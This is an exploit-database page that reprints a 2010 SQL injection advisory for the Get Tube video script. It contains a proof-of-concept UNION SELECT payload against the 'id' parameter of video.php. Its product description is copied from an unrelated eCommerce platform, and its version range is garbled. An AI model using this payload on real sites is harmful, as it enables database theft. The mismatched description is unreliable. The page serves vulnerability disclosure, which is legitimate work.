header-logo
Suggest Exploit
vendor:
Get Tube
by:
Mr.P3rfekT
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Get Tube
Affected Version From: 4.51
Affected Version To: 2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:svcreation:get_tube
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix 10.1
2010

Get Tube 4.51 & All Versions SQL Injection Vulnerability

Freeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systems. Without having to purchase a commercial system and then paying a developer to build custom installation, Freeway does most of what you need out of the box. For example, instead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event sales, Freeway already support events AND services AND subscriptions. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which can lead to the execution of arbitrary SQL commands.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------------
Get Tube 4.51 & All Versions SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]Title Get Tube 4.51 & All Versions SQL Injection Vulnerability
[+]Author Mr.P3rfekT
[+]Contact  Mr.P3rfekT@gmail.com
[+]Tested on   Unix 10.1
[+]Date 2010/8/13
---------------------------------------------------------------------------
[~] Site: http://www.Mr-P3rfekT.Net
[~] Vendor: http://www.svcreation.fr/
[~] Download: http://simon.vrel.free.fr/downloads/GetTube.dmg
[~] Version: 4.51 & 4.5 & v.4.01  v.3.02 v.2.3
[~] Price : Free
==========Pwned By Mr.P3rfekT==========
[+] Description: Freeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systems. Without having to purchase a commercial system and then paying a developer to build custom installation, Freeway does most of what you need out of the box. For example, instead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event sales, Freeway already support events AND services AND subscriptions.
==========================================
 
[+] Dork: No DoRks For Script Kiddies
 
==========================================
 
[ I ].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[P0C]:  http://127.0.0.1/path/video.php?id= SQLi
  

Line : 1 
Column : 1064
 
http://127.0.0.1/path/video.php?id=-4444 union select swfurl 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from  archive

===========================================================================================

Navigation

Suggest Exploit

Services By CQR